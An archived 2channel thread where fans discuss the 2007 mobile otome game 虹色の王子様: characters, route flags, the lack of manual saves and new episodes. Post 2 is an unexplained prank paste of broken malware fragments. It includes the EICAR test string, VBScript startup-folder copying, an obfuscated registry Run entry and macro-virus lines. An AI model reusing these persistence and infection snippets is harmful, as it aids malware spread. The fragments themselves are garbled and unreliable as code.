2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【乙女】虹色の王子様【携帯】

1 :名無しって呼んでいいか?:2007/09/19(水) 17:56:42 ID:???
携帯恋愛シミュレーション虹色の王子様について語るスレです
攻略・雑談など

■対応機種
FOMA900 901 902 903 904 703 704

■アクセス方法
・i-mode→メニューリスト→ゲーム→シミュレーション
http://otome.tw


2 :名無しって呼んでいいか?:2007/09/19(水) 18:35:46 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


3 :名無しって呼んでいいか?:2007/09/21(金) 14:12:46 ID:???
o(^-^)o

4 :名無しって呼んでいいか?:2007/09/21(金) 21:37:28 ID:???
スレ探したらあったけど
過疎?

今日ダウソしたけど背景やスチルが綺麗だね
続きが楽しみだ

5 :名無しって呼んでいいか?:2007/09/22(土) 00:54:31 ID:???
やってみた
まだ序盤だからわからんが
スチルは綺麗だな
あとはこれからの展開次第

6 :名無しって呼んでいいか?:2007/09/24(月) 01:43:57 ID:4UWrMV9H
期待age


7 :名無しって呼んでいいか?:2007/09/25(火) 21:26:09 ID:3jIZK5N1
期待&思案中age

8 :名無しって呼んでいいか?:2007/09/25(火) 23:13:20 ID:???
志波がいる…

9 :名無しって呼んでいいか?:2007/09/26(水) 10:00:39 ID:???
プレイしてる人が少ないのかな?

まだ冒頭だしキャラ揃って無いから
なんとも感想が出ないけど
氷野狙いだったのに、ルディの可愛さにメロメロだ

10 :名無しって呼んでいいか?:2007/09/26(水) 23:27:34 ID:???
空はいつ出てくるんだろう
小学生ならまだしも15で兄兄言ってるってどんだけー



11 :名無しって呼んでいいか?:2007/09/27(木) 16:06:55 ID:???
いつ出てくるんだろうね、宙
兄、兄言ってるけど、兄は誰なのか気になる

これ選択肢どっち選んでも展開は一緒なのかな?
クッキーの時一条についていってもルディと残ったし
好感度が上がるだろうけど、イマイチ分からないし
セーブが自動だからビクビクしながら選んでるよ

12 :名無しって呼んでいいか?:2007/09/27(木) 21:41:35 ID:???
兄は氷野じゃね?
子供のときの髪型が一緒だったのと、眼鏡でなんとなく。

セーブは自由にできるようになるといいけどな
選択肢に対する反応がよくわからないから
好感度上がってるのかどうかよくわからないな

13 :名無しって呼んでいいか?:2007/09/30(日) 12:26:38 ID:???
やっぱ氷野なのかな

配信プレイしちゃったら
何もすることないのがなぁ
せめて章ごとのリセットだったら
次の配信までやり直したり、もう一度見たいシーン見たり
楽しめるのに

14 :名無しって呼んでいいか?:2007/10/01(月) 01:35:22 ID:???
兄は氷野で間違いないんじゃないかな。雰囲気似てるし

まだ序盤だからか、ときめきイベとか台詞がまだないのがなあ…


15 :名無しって呼んでいいか?:2007/10/01(月) 07:33:38 ID:???
携帯公式のキャラセリフで萌えを補ってる
ルディがワンコでイイヨーカワイイヨー

16 :名無しって呼んでいいか?:2007/10/03(水) 21:04:52 ID:???
ほす

17 :名無しって呼んでいいか?:2007/10/03(水) 21:52:16 ID:???
ホント人いないなぁw
機種の幅が狭いからかな?

7章になって眼鏡が主人公に興味持ち始めたから
これから盛り上がるのかなと思ってるけど
個別イベントとかあるのかな?

18 :名無しって呼んでいいか?:2007/10/03(水) 23:18:14 ID:???
氷野のツンデレに萌えたw

19 :名無しって呼んでいいか?:2007/10/07(日) 20:31:02 ID:???
今日ダウンロードして、一気に7話までやってしまった
ヒロインも男キャラも好みだ
早く明日にならんかな


20 :名無しって呼んでいいか?:2007/10/08(月) 11:27:02 ID:???
新章やった





氷野かわいいよ氷野(;´Д`)

21 :名無しって呼んでいいか?:2007/10/08(月) 16:17:04 ID:???
あぁぁ、今日だったか
早速やってくる!

22 :名無しって呼んでいいか?:2007/10/08(月) 21:16:19 ID:???
楽しい。楽しいんだけど
フラグがどうなってんだかさっぱりだorz
セーブできないのが辛すぎる

氷野のツンデレはすごかったw
あれはからかいたくもなるな

23 :名無しって呼んでいいか?:2007/10/09(火) 18:17:05 ID:???
宙狙いだったんだが、氷野にやられてしまった
あの照れっぷりは可愛いすぎるだろ!


やっと宙も出てきたし、次の配信が楽しみだ

24 :名無しって呼んでいいか?:2007/10/10(水) 10:19:56 ID:???
氷野可愛かったな…つかもう、みんなかわいいんだぜ
宙はちょっと腹黒系だよね
どんなふうに動くか楽しみだ

25 :名無しって呼んでいいか?:2007/10/10(水) 17:50:16 ID:???
みんな甘い物好きすぎwww
折角氷野がデレてきたというのに
宙がひっかきまわしそうだね

面白くなってきたゼ

6 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)